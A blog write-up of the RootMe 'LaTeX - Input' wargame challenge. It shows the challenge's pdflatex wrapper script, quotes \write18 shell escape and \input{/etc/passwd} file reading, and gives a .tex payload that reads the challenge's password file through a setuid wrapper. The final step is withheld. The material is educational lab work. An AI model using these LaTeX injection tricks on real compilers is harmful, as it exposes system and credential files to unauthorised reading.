deayzl's blog

[RootMe] LaTeX - Input 본문

wargame writeup | hint/RootMe

[RootMe] LaTeX - Input

deayzl 2022. 7. 3. 01:48

There's no writeup for latex - input challenge found so I'm writing writeup. (This challenge is even 10 points easy one)

But i won't just let you know the full path to flag. I hope you struggle like i did.

#!/usr/bin/env bash
 
if [[ $# -ne 1 ]]; then
    echo "Usage : ${0} TEX_FILE"
fi
 
if [[ -f "${1}" ]]; then
    TMP=$(mktemp -d)
    cp "${1}" "${TMP}/main.tex"
 
    # Compilation
    echo "[+] Compilation ..."
    timeout 5 /usr/bin/pdflatex \
        -halt-on-error \
        -output-format=pdf \
        -output-directory "${TMP}" \
        -no-shell-escape \
        "${TMP}/main.tex" > /dev/null
 
    timeout 5 /usr/bin/pdflatex \
        -halt-on-error \
        -output-format=pdf \
        -output-directory "${TMP}" \
        -no-shell-escape \
        "${TMP}/main.tex" > /dev/null
 
    chmod u+w "${TMP}/main.tex"
    rm "${TMP}/main.tex"
    chmod 750 -R "${TMP}"
    if [[ -f "${TMP}/main.pdf" ]]; then
        echo "[+] Output file : ${TMP}/main.pdf"
    else
        echo "[!] Compilation error, your logs : ${TMP}/main.log"
    fi
else
    echo "[!] Can't access file ${1}"
fi

here's sourcecode, you can guess that if you give file name of some .tex file to this shell, it interprets your .tex file to create pdf using pdflatex. And you can find resources linked below then you can figure out that latex is some program that has a list of commands.

Hacking with LaTeX | Sebastian Neef - 0day.work

 

Hacking with LaTeX

In this blogpost I want to outline basic attacks against web based LaTeX compilers. This inspired me to create the Web90 - TexMaker challenge. TexMaker was a simple website where one could enter LaTeX code and the server would create a PDF file using pdfla

0day.work

-no-shell-escape
Disable the \write18{command} construct, even if it is enabled in the texmf.cnf file.
-shell-restricted
Same as -shell-escape, but limited to a 'safe' set of predefined commands.
-shell-escape
Enable the \write18{command} construct. The command can be any shell command. This construct is normally disallowed for security reasons.

There's no-shell-escape flag on in that sourcecode. So I can't use \write18{}.

Reading files
All modes allow arbitrary files to be read from the filesystem. The easiest way is to use \input:
\input{/etc/passwd}
This will load the contents of the /etc/passwd file into the PDF file.

This seems like the right way to solve this challenge, cause the statement of this challenge was "Do you know how the input command works?".

Okay, then i think i gotta make a .tex file.

Creating a document in LaTeX - Overleaf, 온라인 LaTex 편집기

 

Creating a document in LaTeX - Overleaf, 온라인 LaTex 편집기

사용하기 쉬운 온라인 LaTex 편집기. 설치 필요없음. 실시간 협업. 버전 관리. 수백 개의 LaTex 템플릿. 그리고 그 이상.

ko.overleaf.com

There's a simple code. Let's make file and add \input{} in /tmp/ directory.

\documentclass{article}                                                                                                                                      
                                                                                                                                        
\begin{document}                                                                                                                                             
\input{/challenge/app-script/ch23/.passwd}                                                                                                           
\end{document}

This is the content of .tex file that i created.

./setuid-wrapper /tmp/myfile.tex

You gotta execute setuid-wrapper to execute ch23.sh with app-script-ch23-cracked permission.

Through this process, i created pdf file and i used scp command to bring that file to my computer.

Then I used evince to view my pdf file.

scp -P 2222 app-script-ch23@challenge02.root-me.org:/tmp/tmp.(randomname)/main.pdf ./
evince main.pdf

But my pdf file looked like

The flag is commented on the next line :
Did you get it ?

Well.. this is where i was stuck for like 3 or 4 hours. :(

This says the flag is commented. And I found that '%' (percent character) is the character for commenting.

Then I can guess like i need a function like ignoring special characters or escaping characters.

This is final step to get flag. Go search google about this. Then you can find something.

Add something to the .tex file, and run shell script again. You'll get flag.

Comments